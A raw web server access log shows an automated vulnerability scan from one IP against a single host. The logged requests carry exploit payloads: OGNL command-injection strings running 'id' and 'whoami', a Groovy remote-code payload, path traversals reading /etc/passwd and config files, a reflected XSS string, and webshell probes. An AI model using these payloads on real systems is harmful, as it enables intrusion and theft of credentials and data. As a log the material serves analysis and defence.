195.164.49.69 - - [18/Nov/2024:21:40:37 +0000] GET /.bash_history HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:40:39 +0000] GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 404 1207
195.164.49.69 - - [18/Nov/2024:21:40:41 +0000] GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:40:44 +0000] GET /actuator;/env; HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:40:46 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:40:48 +0000] GET /actuators/logfile HTTP/1.1 404 1095
83.212.98.101 - - [18/Nov/2024:21:40:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:21:40:50 +0000] GET /cgi-bin/status/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:40:52 +0000] GET /httptrace HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:40:54 +0000] GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:40:55 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:40:57 +0000] GET /setup.php HTTP/1.1 404 1083
- - - [18/Nov/2024:21:41:01 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:41:03 +0000] GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 404 1094
- - - [18/Nov/2024:21:41:05 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:41:07 +0000] GET /?pretty HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:42:06 +0000] GET /portal/application/libraries/dompdf/www/setup.php HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:21:42:08 +0000] GET /SWNetPerfMon.db.i18n.ashx?l=nycmn&v=nycmn HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:42:10 +0000] GET /.ksh_history HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:42:13 +0000] GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:42:14 +0000] GET /message-api/actuator/env HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:21:42:16 +0000] GET /test.cgi HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:21:42:18 +0000] GET /actuator/httptrace HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:42:20 +0000] GET /_cat/indices?v HTTP/1.1 404 1090
83.212.98.101 - - [18/Nov/2024:21:42:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:21:42:51 +0000] GET /sites/all/libraries/dompdf/www/setup.php HTTP/1.1 404 1134
195.164.49.69 - - [18/Nov/2024:21:42:53 +0000] GET /.sh_history HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:21:42:55 +0000] GET /debug.cgi HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:42:57 +0000] GET /_all/_search HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:42:59 +0000] GET /vendor/dompdf/dompdf/www/setup.php HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:21:43:01 +0000] GET /.zsh_history HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:43:02 +0000] GET /cgi-bin/test-cgi HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:43:04 +0000] GET /_cluster/health?pretty HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:43:12 +0000] GET /reports/rwservlet/showenv HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:43:19 +0000] POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 404 1161
195.164.49.69 - - [18/Nov/2024:21:43:21 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:43:23 +0000] POST /crowd/admin/uploadplugin.action HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:21:43:31 +0000] POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:21:43:31 +0000] POST /website/blog/ HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:43:35 +0000] POST /scripts/setup.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:43:35 +0000] POST /photo/p/api/album.php HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:43:37 +0000] GET /api/experimental/test HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:43:39 +0000] POST /run HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:43:41 +0000] POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 404 1130
195.164.49.69 - - [18/Nov/2024:21:43:44 +0000] PUT /poc.jsp/ HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:21:43:47 +0000] GET /cgi-bin/kvm?LD_DEBUG=help HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:43:49 +0000] POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 404 1158
195.164.49.69 - - [18/Nov/2024:21:43:53 +0000] GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:43:55 +0000] GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:44:00 +0000] GET /cgi-bin/admin?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:44:00 +0000] GET /cgi-bin/apply?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:44:00 +0000] GET /cgi-bin/non-CA-rev?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:44:00 +0000] GET /cgi-bin/cgitest?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:44:00 +0000] GET /cgi-bin/checkCookie?LD_DEBUG=help HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:21:44:01 +0000] GET /cgi-bin/check_user?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:44:01 +0000] GET /cgi-bin/chn/liveView?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:44:01 +0000] GET /cgi-bin/cht/liveView?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:44:01 +0000] GET /cgi-bin/cnswebserver?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:44:01 +0000] GET /cgi-bin/config?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:44:01 +0000] GET /cgi-bin/configure/set_link_neg?LD_DEBUG=help HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:21:44:01 +0000] GET /cgi-bin/configure/swports_adjust?LD_DEBUG=help HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:21:44:01 +0000] GET /cgi-bin/eng/liveView?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:44:01 +0000] GET /cgi-bin/firmware?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:44:02 +0000] GET /cgi-bin/getCheckCode?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:44:02 +0000] GET /cgi-bin/get_status?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:44:02 +0000] GET /cgi-bin/getmac?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:44:02 +0000] GET /cgi-bin/getparam?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:44:02 +0000] GET /cgi-bin/guest/Login?LD_DEBUG=help HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:44:02 +0000] GET /cgi-bin/home?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:44:02 +0000] GET /cgi-bin/htmlmgr?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:44:02 +0000] GET /cgi-bin/index?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:44:02 +0000] GET /cgi-bin/index/login?LD_DEBUG=help HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:44:03 +0000] GET /cgi-bin/jscript?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:44:09 +0000] GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 404 1086
- - - [18/Nov/2024:21:44:09 +0000] GET null HTTP/1.1 400 2308
- - - [18/Nov/2024:21:44:09 +0000] GET null HTTP/1.1 400 2308
- - - [18/Nov/2024:21:44:13 +0000] GET null HTTP/1.1 400 2308
- - - [18/Nov/2024:21:44:14 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:44:14 +0000] GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 404 1086
- - - [18/Nov/2024:21:44:14 +0000] GET null HTTP/1.1 400 2308
- - - [18/Nov/2024:21:44:14 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:44:59 +0000] GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:45:01 +0000] GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:45:08 +0000] GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2p2ZZwvbmFtJER8nZkL1drhRtIa.jsp HTTP/1.1 404 1200
195.164.49.69 - - [18/Nov/2024:21:45:13 +0000] GET /crowd/plugins/servlet/exp HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:21:45:15 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:45:18 +0000] GET /owa/auth/x.js HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:45:20 +0000] POST /_search HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:45:21 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:45:27 +0000] GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 404 1155
195.164.49.69 - - [18/Nov/2024:21:45:29 +0000] PUT /SDK/webLanguage HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:21:45:33 +0000] GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:21:45:35 +0000] GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:45:37 +0000] GET /cgi-bin/liveView?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:45:42 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:45:43 +0000] GET /ext-js/index.html HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:45:45 +0000] GET /STATE_ID/123/agentLogUploader HTTP/1.1 404 1111
83.212.98.101 - - [18/Nov/2024:21:45:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:21:45:53 +0000] GET /cgi-bin/login?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:45:53 +0000] GET /cgi-bin/login.asp?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:45:53 +0000] GET /cgi-bin/login/login?LD_DEBUG=help HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:45:53 +0000] GET /cgi-bin/login/login-page?LD_DEBUG=help HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:21:45:53 +0000] GET /cgi-bin/login_mgr?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:45:53 +0000] GET /cgi-bin/luci?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:45:53 +0000] GET /cgi-bin/main?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:45:53 +0000] GET /cgi-bin/main-cgi?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:45:53 +0000] GET /cgi-bin/manage/login?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:45:54 +0000] GET /cgi-bin/menu?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:45:54 +0000] GET /cgi-bin/mlogin?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:45:54 +0000] GET /cgi-bin/netbinary?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:45:54 +0000] GET /cgi-bin/nobody/Captcha?LD_DEBUG=help HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:45:54 +0000] GET /cgi-bin/nobody/VerifyCode?LD_DEBUG=help HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:45:54 +0000] GET /cgi-bin/normal_userLogin?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:45:54 +0000] GET /cgi-bin/otgw?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:45:54 +0000] GET /cgi-bin/page?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:45:54 +0000] GET /cgi-bin/rulectl?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:45:54 +0000] GET /cgi-bin/service?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:45:55 +0000] GET /cgi-bin/set_new_config?LD_DEBUG=help HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:45:55 +0000] GET /cgi-bin/sl_webviewer?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:45:55 +0000] GET /cgi-bin/ssi?LD_DEBUG=help HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:45:55 +0000] GET /cgi-bin/status?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:45:55 +0000] GET /cgi-bin/sysconf?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:46:23 +0000] POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:46:44 +0000] GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1 404 1365
195.164.49.69 - - [18/Nov/2024:21:46:46 +0000] POST /conf_mail.php HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:46:50 +0000] POST /xmlrpc HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:21:46:51 +0000] POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:21:46:54 +0000] GET /rest/api/latest/repos HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:46:55 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:47:00 +0000] POST /SamlResponseServlet HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:47:01 +0000] POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 404 1147
195.164.49.69 - - [18/Nov/2024:21:47:03 +0000] GET /x HTTP/1.1 404 1075
195.164.49.69 - - [18/Nov/2024:21:47:07 +0000] POST /%2577eb%2575i_%2577sma_Http HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:47:07 +0000] POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1 404 1160
195.164.49.69 - - [18/Nov/2024:21:47:09 +0000] GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1 400 1160
83.212.98.101 - - [18/Nov/2024:21:47:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:21:47:52 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:53 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:53 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:53 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:54 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:54 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:54 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:54 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:54 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:54 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:47:54 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:54 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:55 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:55 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:55 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:55 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:55 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:55 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:55 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:47:55 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:55 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:55 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:56 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:56 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:47:56 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:48:01 +0000] GET /cgi-bin/systemutil?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:48:03 +0000] POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 404 1134
195.164.49.69 - - [18/Nov/2024:21:48:07 +0000] POST /minio/bootstrap/v1/verify HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:21:48:14 +0000] GET /cgi-bin/t/out?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:48:15 +0000] GET /cgi-bin/top?LD_DEBUG=help HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:48:15 +0000] GET /cgi-bin/unauth?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:48:15 +0000] GET /cgi-bin/upload?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:48:15 +0000] GET /cgi-bin/variable?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:48:15 +0000] GET /cgi-bin/wanstatu?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:48:15 +0000] GET /cgi-bin/webcm?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:48:15 +0000] GET /cgi-bin/webmain?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:48:15 +0000] GET /cgi-bin/webproc?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:48:15 +0000] GET /cgi-bin/webscr?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:48:16 +0000] GET /cgi-bin/webviewLogin?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:48:16 +0000] GET /cgi-bin/webviewLogin_m64?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:48:16 +0000] GET /cgi-bin/webviewer?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:48:16 +0000] GET /cgi-bin/welcome?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:48:33 +0000] GET /OA_CGI/FNDWRR.exe HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:48:41 +0000] GET /_api/web/siteusers HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:48:45 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:48:51 +0000] POST /userentry?accountId=/../../../tomcat/webapps/wdtEY/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:48:53 +0000] POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:21:48:58 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:49:01 +0000] GET /cgi-mod/view_help.cgi HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:49:03 +0000] GET /cslu/v1/scheduler/jobs HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:21:49:07 +0000] GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:21:49:09 +0000] POST /app/rest/users/id:1/tokens/2p2ZZyYPBO7onytTfXxxqLmPQBD;.jsp?jsp_precompile=true HTTP/1.1 404 1153
195.164.49.69 - - [18/Nov/2024:21:49:11 +0000] POST /api/users HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:49:12 +0000] POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:21:49:47 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:48 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:49:48 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:48 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:48 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:48 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:49 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:49 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:49 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:49 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:49 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:49:49 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:49 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:49 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:50 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:50 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:50 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:50 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:50 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:49:50 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:49:56 +0000] POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:21:49:58 +0000] POST /clients/MyCRL HTTP/1.1 404 1091
